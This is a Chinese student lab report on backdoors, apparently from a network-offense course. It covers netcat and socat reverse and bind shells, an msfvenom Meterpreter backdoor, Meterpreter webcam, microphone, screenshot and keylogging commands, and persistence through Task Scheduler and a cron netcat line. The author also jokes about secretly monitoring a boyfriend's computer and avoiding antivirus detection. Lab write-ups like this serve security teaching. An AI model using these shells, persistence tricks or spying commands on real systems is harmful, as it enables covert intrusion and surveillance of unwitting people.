20144306《网络对抗》MAL_后门原理与实践
本期收获
1.了解后门的基本概念。
2.Netcat、socat、MSF meterpreter的使用(MSF meterpreter实在太好玩了)
3.后门软件的启动方式:
Windows任务计划程序
Linux任务管理器crontab的使用
网络配置最简单的方式
虚拟机网络适配器设置:选择最简单的NAT模式。
再注意检查下可移动设备的开启情况,一定要勾选上网络设配器。
两个系统都一样,都可以选择NAT模式。
可能出现各种连不上网络,或者报错:由于连接方在一段时间没有正确答复或者连接的主机没有反应,连接尝试失败,都可以通过上述配置解决。
常用后门工具实践
一.Windows获得Linux Shell
- 在Windows(XP)下,先使用ipconfig指令查看本机IP:
- 调用ncat.exe程序来蹲守本机的4306端口:
- 在Kali环境下,使用nc指令的-e参数反向连接Windows主机的4306端口:
- Windows下成功获得了一个Kali的shell,可以在cmd.exe上运行linux指令:
二.Linux获得Windows Shell
- 过程就是前面的步骤反过来,在Kali环境下用ifconfig命令查看IP:
- 使用nc指令蹲守4306端口:
- 在Windows下,调用ncat.exe程序并用-e参数反向连接Kali主机的4306端口:
- Kali下可以穿越般的看到Windows的命令提示,可以输入Windows命令ipconfig来测试:
三.扩展知识:使用nc传输数据
- Windows下蹲守4306端口:
- Kali下连接到Windows的4306端口:
- 建立连接之后,就可以传输数据了,这里就象征性的传几个单词吧(后面会用重定向操作符传文件的),生生玩成了聊天软件,比如你在kali上打字,windows主机屏幕上也会显示你打的内容:
四.扩展知识:socat
增强版ncat~~使用的格式是socat [options]
<address> <address>,其中两个address是必选项,而options 是可选项。socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。
- 在Windows系统下,运行cmd.exe,输入命令:socat.exe tcp-listen:4306 exec:cmd,pty,stderr (注意路径,否则可能无法识别命令,比如我将socat.Exe存储在C:\Users\Administrator\Desktop\2016-2017第二学期资料\网络攻防\工具包\socat\socat文件夹下,就要加上这条路径)这条命令把cmd绑定到端口4306,同时把cmd的stderr重定向到stdout。中间要是蹦出什么防火墙之类的直接无视就好了。
- 此时,在Kali环境下输入指令socat - tcp:192.168.163.1:4306,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的4306端口,这条命令等同于nc 192.168.163.1 4306,回车后可以发现已经成功获得了一个cmd shell:
然后我输入了挚爱的ipconfig命令,场面有点暴力。
五.Meterpreter的使用
- 输入指令msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.163.135 LPORT=4306 -f exe > 20144306_backdoor.exe生成后门程序(这就是用ncat重定向符传文件了):
- 通过ncat文件传输功能将生成的后门程序传送到Windows主机上:
- 在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP(kali)和端口(4306):
- 设置完成后,输入exploit:
- 在Windows上执行后门程序:
- 此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
六.将MSF
meterpreter玩坏……
- 使用record_mic指令可以录一段音频:
- 如果报错:
- 说明虚拟机声卡没打开,打开声卡如下:
- 点击虚拟机->设置->添加->声卡
- 使用默认主机声卡就好。
- 使用webcam_snap指令可以使用摄像头进行偷拍(好像黑镜……可怕):
- 使用webcam stream指令可以使用摄像头进行录像(请忽略露只眼睛按停止键的垃圾作者):
- 使用screenshot指令可以进行截屏:
- 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:
- 获取Windows命令行界面,以方便执行Windows内置功能,再来一个ipconfig吧。
后门启动
一.Windows
- 打开Windows->控制面板->管理工具->任务计划程序
新建任务计划:
- 创建触发器:
- 创建操作(是否添加参数可选):
在主控机上打开后门程序20144306_backdoor.exe.
二.Linux上cron启动
- 先在Windows系统下,监听4306端口:
- 键入crontab -e,按a进入编辑界面。
- 在最后一行添加18 * * * * /bin/netcat 192.168.163.134 4306 -e /bin/sh,意思是在每个小时的第18分钟反向连接Windows主机的4306端口:
- 按:wq保存退出后显示:
- 当时间到了18点18时(这时间感觉很吉利),此时已经获得了Kali的shell,可以输入指令(18:18之前输入没有反应的):
实验总结与体会
- 实验过程中感觉对虚拟机配置进行了磨练一般的进修,期间蹦出了各种问题,光光就联网问题,就弄了好久(捂脸),然后设置虚拟机声卡、怎么在虚拟机上使用摄像头都卡顿了,要学习的真的很多,不过好在各种问题都解决了。
- 感触最深的是meterpreter的使用,虽然没有真正去监视谁谁的电脑,但一套做下来也是爽的毛骨悚然,如果真的不知不觉被人控制了摄像头,那真就gigi了,但我觉得最重要的还是要做得不知不觉,不然一放到别人主机,就直接给杀毒软件灭了,说实话,我真的很想知道怎么监控男朋友的电脑……这个实验真的很有趣,内容也比较丰富,收获丰富,自己一条指令生成个后门软件也是很有意思。
- 真的要提高安全意识!!!不明端口不明程序直接关掉删除吧,被监控真的好可拍,输密码被看,做坏事被偷拍,哎,老大哥在看着你。
- Meterpreter上的图画真的很好看!!
- 提高安全意识是好的,真的不要拿这些手段去做好坏事,但是说实话,linux真的比windows有趣多了。
By 20144306
Date:2017.3.15
20144306《网络对抗》MAL_后门原理与实践的更多相关文章
- 20155323刘威良 网络对抗 Exp2 后门原理与实践
20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...
- 20145214《网络对抗》MAL_后门原理与实践
20145214<网络对抗>MAL_后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 网页上查找资料时有时会不小心点到弹出来的广告,如果这个广告是个钓鱼 ...
- Exp2 MAL_后门原理与实践 20155214
目录 Exp2 MAL_后门原理与实践 实验内容 通过nc反向连接创建后门 meterpreter应用 主要思路 知识点 启发 Exp2 MAL_后门原理与实践 本次实验操使用nc实现win,mac, ...
- 20155331 丹增旦达 网络攻防 Exp2后门原理与实践
20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155302 Exp2 后门原理与实践
20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...
- 20145204《网络对抗》MAL后门原理与实践
20145204<网络对抗>MAL后门原理与实践 实践内容说明 (1)使用netcat获取主机操作Shell,cron启动 (1分) (2)使用socat获取主机操作Shell, 任务计划 ...
- 2017-2018-2 《网络对抗技术》 20155322 第五周 Exp2 后门原理与实践
#2017-2018-2 <网络对抗技术> 20155322 第五周 Exp2 后门原理与实践 [博客目录] 1-实践目标 1.1-实践介绍 1.2-实践内容 1.3-实践要求 2-实践过 ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
随机推荐
- Android学习CursorWrapper与Decorator模式 (转至http://www.cnblogs.com/bastard/archive/2012/05/31/2527944.html)
一 Decorator模式 意图: 动态的给一个对象添加一些额外的职责.就增加功能来说,Decorator模式相比生成子类更为灵活. 动态的给一个对象,而不是对整个类添加额外职责,说明此模式将采用的结 ...
- CentOS下添加sudo用户
一 .sodo的使用 1.1 关于sudo Sudo是linux系统中,非root权限的用户提升自己权限来执行某些特性命令的方式,它使普通用户在不知道超级用户的密码的情况下,也可以暂时的获得root权 ...
- 浮点纹理 opengl
原文地址:http://wangqingyun84.blog.163.com/blog/static/790836172010323113604/ 因为 glsl部分 绑定fbo 看到要用浮点纹理,搜 ...
- mac Virtualbox Ubuntu 设置共享目录
如果要用VirtualBox自带的共享文件夹功能,必须先安装Guest Additions.安装方法:置顶的菜单条->devices->Install Guest Additions.点击 ...
- svn merge和branch分析
[转载] 使用svn几年了,一直对分支和合并敬而远之,一来是因为分支的管理不该我操心,二来即使涉及到分支的管理,也不敢贸然使用合并功能,生怕合并出了问题对团队造成不良影响,最主要的原因是,自己对分支的 ...
- ASP------字符串与HTML格式相互转换
代码: 1.字符串转HTML HttpUtility.HtmlDecode(" is ") 或者 Server.UrlDecode(" is ") 2.HTML ...
- 06python 之基本数据类型
数字 int(整型) 在32位机器上,整数的位数为32位,取值范围为-2**31~2**31-1,即-2147483648~2147483646 在64位机器上,整数的位数为64位,取值范围为-2** ...
- list中的比较
一说到list的的确不知道写些什么.....我觉得别人总结的比我写的还要好很多. 我擅长记录自己的误区. |--List:元素是有序的(怎么存的就怎么取出来,顺序不会乱),元素可以重复(角标1上有个3 ...
- 查看磁盘读写:iostat
iostat命令用来查看磁盘IO的读写情况,用法如下: [root@localhost ~]$ yum install -y sysstat # 安装iostat命令 [root@localhost ...
- php学习九:存取器&魔术方法
当声明属性的时候用到了private,那么的话只能本类中才能访问此属性,其他地方无法使用,这个时候需要给外界提供一些方法来使外界访问 方法一:存取器: 可以提供一个public的方法来使外界对类里面的 ...